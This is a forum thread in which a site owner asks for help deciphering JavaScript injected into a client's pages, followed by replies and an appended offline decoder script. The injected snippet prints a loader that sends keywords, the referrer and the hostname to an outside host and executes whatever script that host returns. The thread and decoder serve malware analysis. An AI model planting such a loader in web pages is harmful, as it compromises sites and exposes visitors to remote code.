
Help me decipher injected code?

Discussion in 'BlackHat Lounge' started by nikchaing, Jun 2, 2016.

  1. nikchaing

    nikchaing, Jr. VIP, UnGagged Attendee
    Hey guys, I have a client that has a backdoor somewhere on their server. It keeps injecting this code to the header of pages. I'm pretty sure they're just gonna scrap it all, and start over fresh on another server. My question is, can someone help me understand what exactly this script is doing. Seems like it's presenting the injected content based on a certain referrer, but that's all that I can gather. I would greatly appreciate any insight you may have. Thanks!

    Code:
    <script>
    var a = '';
    setTimeout(10); // filler: the argument is not a function, so nothing useful is scheduled
    // Every clause after the first is always true (document.referrer is always a
    // string in a browser, never undefined or null) and they are joined with ||,
    // so this gate passes on every page load no matter what the referrer is.
    if (document.referrer.indexOf(location.protocol + "//" + location.host) !== 0 ||
        document.referrer !== undefined ||
        document.referrer !== '' ||
        document.referrer !== null) {
      // Keyword to report: concatenated <meta name="keywords"> content, else ?utm_term=, else the page title
      var k = (function () {
        var keywords = '';
        var metas = document.getElementsByTagName('meta');
        if (metas) {
          for (var x = 0, y = metas.length; x < y; x++) {
            if (metas[x].name.toLowerCase() == "keywords") { keywords += metas[x].content; }
          }
        }
        return keywords !== '' ? keywords : null;
      })();
      var v, t;
      var kw = k == null
        ? ((v = window.location.search.match(/utm_term=([^&]+)/)) == null
            ? ((t = document.title) == null ? '' : t)
            : v[1])
        : k;
      // Writes a remote <script>. The c_utm parameter is itself a URL carrying the
      // keyword, the referrer and this site's hostname; whatever the remote PHP
      // returns is executed in the page.
      document.write('<script type="text/javascript" src="http://vertekoasys.com/js/jquery.min.php?c_utt=G91825&c_utm='
        + encodeURIComponent('http://vertekoasys.com/js/jquery.min.php' + '?'
          + 'default_keyword=' + encodeURIComponent(kw)
          + '&se_referrer=' + encodeURIComponent(document.referrer)
          + '&source=' + encodeURIComponent(window.location.host))
        + '"><' + '/script>');
    }
    </script>
    
     
  2. McPatrick

    McPatrick Regular Member

    I am not a JS guy, but did you try to run a malware/injection scan on your server?
     
  3. tb303

    tb303 Senior Member

    Looks like it's inserting a <script> when there's no referrer (direct hit) that downloads and runs some JavaScript returned by the PHP at "hxxp://vertekoasys.com/js/jquery.min.php?....".

    I don't know what that JS is, as it requires various params sent by the injected code like meta keywords, document title and more, and I have no intention of running that script. The URL just returns nothing if they are missing.

    If possible, nuke it and be safe.
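Added example, not code from the thread or from either poster: it re-implements the injected snippet's referrer gate and URL construction against a fake document and location, so you can see exactly what the beacon would send without ever loading the remote script. The host, path, parameter names and the c_utt value are copied from the injected code; the sample page (www.example.com, the Google referrer, the keywords and title) is constructed for the demo. Running it shows two things the one-line original hides: the gate is always true (document.referrer is a string, so the `!== undefined` / `!== null` clauses joined with `||` can never fail), and the c_utm parameter is a second URL carrying the victim's keywords, referrer and hostname.

```javascript
"use strict";
// Added example, not code from the thread. Re-implements the injected snippet's
// referrer gate and URL building against a fake document/location so the beacon
// can be inspected offline. Nothing is fetched from vertekoasys.com.

// Constants copied from the injected snippet
const BEACON = "http://vertekoasys.com/js/jquery.min.php";
const C_UTT = "G91825";

// The snippet's if(...) condition, clause for clause. document.referrer is
// always a string in browsers, so `!== undefined` and `!== null` are always
// true and, joined with ||, make the whole gate true on every page load.
function gateFires(referrer, loc) {
  return (
    referrer.indexOf(loc.protocol + "//" + loc.host) !== 0 ||
    referrer !== undefined ||
    referrer !== "" ||
    referrer !== null
  );
}

// Keyword selection in the snippet's priority order:
// <meta name="keywords"> content (concatenated), else ?utm_term=, else <title>.
function pickKeyword(doc, loc) {
  let keywords = "";
  for (const m of doc.metas) {
    if (m.name.toLowerCase() === "keywords") keywords += m.content;
  }
  if (keywords !== "") return keywords;
  const v = loc.search.match(/utm_term=([^&]+)/);
  if (v !== null) return v[1];
  return doc.title == null ? "" : doc.title;
}

// The src the snippet writes into the page: c_utm is a second, fully encoded
// URL carrying the keyword (encoded twice), the referrer and the victim host.
function buildBeaconUrl(doc, loc) {
  const inner =
    BEACON + "?" +
    "default_keyword=" + encodeURIComponent(pickKeyword(doc, loc)) +
    "&se_referrer=" + encodeURIComponent(doc.referrer) +
    "&source=" + encodeURIComponent(loc.host);
  return BEACON + "?c_utt=" + C_UTT + "&c_utm=" + encodeURIComponent(inner);
}

// What the attacker's PHP receives once both encoding layers are undone.
function decodeBeacon(url) {
  const outer = new URL(url);
  const inner = new URL(outer.searchParams.get("c_utm"));
  return {
    c_utt: outer.searchParams.get("c_utt"),
    default_keyword: inner.searchParams.get("default_keyword"),
    se_referrer: inner.searchParams.get("se_referrer"),
    source: inner.searchParams.get("source"),
  };
}

// Constructed sample page standing in for the compromised site (made up values).
const sampleDoc = {
  referrer: "https://www.google.com/search?q=cheap+widgets",
  title: "Acme Widgets - Home",
  metas: [
    { name: "viewport", content: "width=device-width" },
    { name: "Keywords", content: "widgets, gadgets" },
  ],
};
const sampleLoc = { protocol: "https:", host: "www.example.com", search: "?utm_term=blue+widgets" };

// Same-site and empty referrers still pass the gate: the "referrer check" is not one.
console.log("gate, same-site referrer:", gateFires("https://www.example.com/", sampleLoc));
console.log("gate, empty referrer:", gateFires("", sampleLoc));
console.log(decodeBeacon(buildBeaconUrl(sampleDoc, sampleLoc)));
```

Run it with node; decodeBeacon is the part worth keeping around, since the same nested c_utm pattern lets you read a captured beacon request straight out of a proxy or web-server log without touching the attacker's endpoint.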